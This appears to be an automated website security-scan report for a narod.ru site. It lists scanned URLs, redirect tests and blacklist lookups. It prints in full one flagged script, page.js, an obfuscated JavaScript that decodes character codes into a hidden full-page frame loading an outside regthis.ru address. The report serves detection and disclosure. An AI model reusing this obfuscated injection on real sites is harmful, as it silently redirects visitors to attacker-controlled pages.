Scanned pages/files
Request | Server response | Status |
http://inreslidi.narod.ru/6/post-236.html | 200 OK Content-Length: 40052 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.637501869739054 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=LnKL4Dgu4GC8p^yrJjt!KFRgU^SRakk7bEKElApTDXvwSKOiV9YVaLMn0mT1zX6iWDlvVPJb6fxBMlg7L;tXdWSyCqQ3VzAU^EkSO2c3!Nk;DJ!4wsABsxlxIlbrg3M8RlFJiY8ruaTg7GfBZzpBc8E72cHQRN^^uVnAEsmOvacpE1ZOLBpuzZRPV;YIAUoo | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/js/page.js | 200 OK Content-Length: 802 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out="";
var str="60-102-114-97-109-101-115-101-116-32-114-111-119-115-61-34-49-48-48-37-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-102-114-97-109-101-115-112-97-99-105-110-103-61-34-48-34-62-13-10-60-102-114-97-109-101-32-115-114-99-61-34-104-116-116-112-58-47-47-114-101-103-116-104-105-115-46-114-117-47-103-111-46-112-104-112-63-115-105-100-61-50-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-109-97-114-103-105-110-119-105-100-116-104-61-34-48-34-32-109-97-114-103-105-110-104-101-105-103-104-116-61-34-48-34-62-13-10-60-47-102-114-97-109-101-115-101-116-62-"; l=str.length; while(c<=str.length-1){ while(str.charAt(c)!='-')temp=temp+str.charAt(c++); c++; out=out+String.fromCharCode(temp); temp=""; } document.write(out); Antivirus reports:
| ||
http://inreslidi.narod.ru/index.html | 200 OK Content-Length: 36884 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.313116554773952 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=t;fW9ViX9nUer5CtzeAu91exWW55Cr2UeNG19QLtMttqxFEuflMyLDfR0M622eBs8auqMu073;RbDKFg24bhyMpxSVyg5icfSn0NGKrKFRnb!7eYpKvdM^MC8YpWE4bSF^0hVqEzA;ziZjLUQwY4dTgOrNyN6QhNjTOcOkEmWbcC;;lQlVhZ5dVPt8kvJEuP | 200 OK Content-Length: 2497 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/archive-09-07-2010/post-155.html | 200 OK Content-Length: 37013 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.175786546534113 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=D4UN3dvCztL;xILZYnV!cIWPDc^uZKd7zPF4TcaKQq9AP9jze2RgVZUs4SDjNm7skirtM!9BXOPSpc5wLRquaeYj9NWpep;jiIU;Cnz9a6YlvrCdEB5SshFdk5UupnTUSmyngkChX8GgmCJs8QnYnnkweYFn!0bW1^!It78TPpy6hfcVQQpau0zYHDLNX7xG | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/cat-4/374.html | 200 OK Content-Length: 38016 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.254458279452571 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=kacRN66lmtF4CpQ;;qQUR4hi4JAK^PEw6ES1gjg^O681fumEh8wbnhOUN9qACtSZB2PZXTefrt0aGWbwN3dGClzb5x1sXYp0xe2G!2pu8K6gRrsNq3eWxq62N2wcTj77ta7Tbz3iIqVR;GAeKF0kilJkfN;0ZgMeu655alaGI6xAgaZsV6^Kss31RUtddcwo | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/5-14-02-2010/article-307.html | 200 OK Content-Length: 37978 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.897237100631504 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inreslidi.narod.ru
Result:
GET / HTTP/1.1
Host: inreslidi.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: inreslidi.narod.ru
Referer: http://www.google.com/search?q=inreslidi.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: inreslidi.narod.ru
Referer: http://www.google.com/search?q=inreslidi.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inreslidi.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://inreslidi.narod.ru/
Result: inreslidi.narod.ru is not infected or malware details are not published yet.
Result: inreslidi.narod.ru is not infected or malware details are not published yet.